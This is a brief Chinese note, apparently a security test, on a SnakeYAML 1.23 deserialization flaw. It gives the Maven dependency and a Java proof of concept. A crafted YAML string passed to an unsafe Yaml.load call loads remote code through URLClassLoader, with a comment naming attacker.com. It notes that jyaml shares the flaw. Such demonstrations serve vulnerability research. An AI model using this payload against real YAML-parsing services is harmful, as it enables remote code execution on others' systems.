Maven的Pom引入依赖包

  1. <!-- https://mvnrepository.com/artifact/org.yaml/snakeyaml -->
  2. <dependency>
  3.     <groupId>org.yaml</groupId>
  4.     <artifactId>snakeyaml</artifactId>
  5.     <version>1.23</version>
  6. </dependency>

Java代码调试

  1. package com.alibaba.middleware.hsf;
  3. import org.yaml.snakeyaml.Yaml;
  5. /**
  6.  * Created by xiaoming.linxm on 2018/10/24.
  7.  */
  8. public class testRCE001 {
  9.     public static void main(String[] argv){
  10.         String malicious = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader "
  11.                 + "[[!!java.net.URL [\"http://localhost\"]]]]";
  12.         Yaml yaml = new Yaml();            // Unsafe instance of Yaml that allows any constructor to be called.
  13.         Object obj = yaml.load(malicious); // Make request to http://attacker.com
  14.     }
  15. }

同样问题

  • org.jyaml:jyaml有一样的问题,用法同上面。